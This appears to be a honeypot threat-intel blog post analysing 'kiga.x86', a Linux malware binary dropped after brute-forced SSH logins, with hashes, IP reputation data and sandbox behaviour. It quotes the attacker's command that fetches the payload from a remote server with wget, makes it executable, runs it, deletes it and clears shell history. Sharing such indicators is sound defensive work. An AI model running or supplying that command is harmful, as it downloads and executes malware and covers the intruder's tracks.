ELF Analysis- kiga.x86

In addition to my weekly threat intel report, I’ll highlight a file/executable/exploit attempt seen in the last week.  I’ll do some basic file analysis to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.

This week we’re looking at kiga.x86. Using various username and password combinations, an IP address from Russia attempted to login to my ssh honeypot 640 times. I allow the username root with any password, which they used to successfully authenticate 15 times.  When logged in, the bot issued one command, which fetched their payload(kiga.x86), made sure it was executable, ran it, removed the payload from the machine and cleared the cli history. Kiga.x86 is a linux executable, that doesn’t give us much info about it’s behavior at first glance. Based on execution analysis, it appears to remove and execute programs in the /tmp folder. It could be used to clear other droppers and make sure it’s payloads are being executed.

Attacker Commands:
wget http://185[dot]172[dot]110[dot]214/AB4g5/kiga[dot]x86; chmod 777 *; ./kiga[dot]x86 Roots;rm -rf kiga[dot]x86; history -c

Filename: kiga.x86
Timestamp: 2020-06-14 05:11PM PST
Initiating Source IP: 93.157.62.102
Downloaded from: http://185[dot]172[dot]110[dot]214/AB4g5/kiga.x86
SHA256: c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Virus Total Link: https://www.virustotal.com/gui/file/c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1/detection

File Contents:
file kiga.x86
kiga.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Initiating Source IP Analysis:

Analysis Date2020-06-14 22:12:08
Elapsed Time3 seconds
Blacklist StatusBLACKLISTED 28/114
IP Address93.157.62.102 Find Sites | IP Whois
Reverse DNSmta23.dealzania.site
ASNAS43350
ASN OwnerNForce Entertainment B.V.
ISPNFOrce Entertainment B.V.
ContinentEurope
Country CodeFlag  (RU) Russia
Latitude / Longitude55.7386 / 37.6068 Google Map
CityUnknown
RegionUnknown

Download URL analysis:

Analysis Date2020-06-14 22:13:10
Elapsed Time16 seconds
Blacklist StatusBLACKLISTED 4/114
IP Address185.172.110.214 Find Sites | IP Whois
Reverse DNSUnknown
ASNAS206898
ASN OwnerServer Hosting Pty Ltd
ISPServer Hosting Pty Ltd
ContinentEurope
Country CodeFlag  (NL) Netherlands
Latitude / Longitude52.3824 / 4.8995 Google Map
CityUnknown
RegionUnknown

Virus Total Stats:
As of 2020-06-14, 31/60 engines detect this file as malicious

Additional properties:
MD5        7b65dec7862e5fbde95fbeb33e10468b
SHA-1        ec2556fd8052d48376da56ce5abdb22ce12b557d
SHA-256        c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Vhash        7bb8336eb02c878841bb63e512d6698e
SSDEEP        1536:pvfI8quwTDx27izeXbcziMnEfzwTOEVz3kZIIxYaZH5H5b:1zquSDx22zeXbqEfz+OE5UKI2WHxh
File type        ELF
Magic        ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
File size        60.98 KB (62448 bytes)

ELF Info:
Header
Class        ELF32
Data        2’s complement, little endian
Header Version        1 (current)
OS ABI        UNIX – System V
Object File Type        EXEC (Executable file)
Required Architecture        Intel 80386
Object File Version        0x1
Program Headers        3
Section Headers        10

Windows Defender:

Example actions:
Processes Terminated
When executing the file being studied, the following processes were terminated.

  • /tmp/EB93A6/996E.elf
  • /lib/systemd/systemd-udevd –daemon

Tancent Analysis:

SHA256:c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
File type:ELF32

Process 

Behaviour:Execute a file
Detail info:execve: /tmp/bin/****.elf
Behaviour:Process exit
Detail info:procexit status=256 procexit status=136 procexit status=0

Network 

Behaviour:connect
Detail info:connect: 192.168.0.**:60869->8.8.8.8:domain
Behaviour:socket
Detail info:socket: domain=2(AF_INET) type=2 proto=0 socket: domain=2(AF_INET) type=1 proto=0

Leave a Reply

Your email address will not be published. Required fields are marked *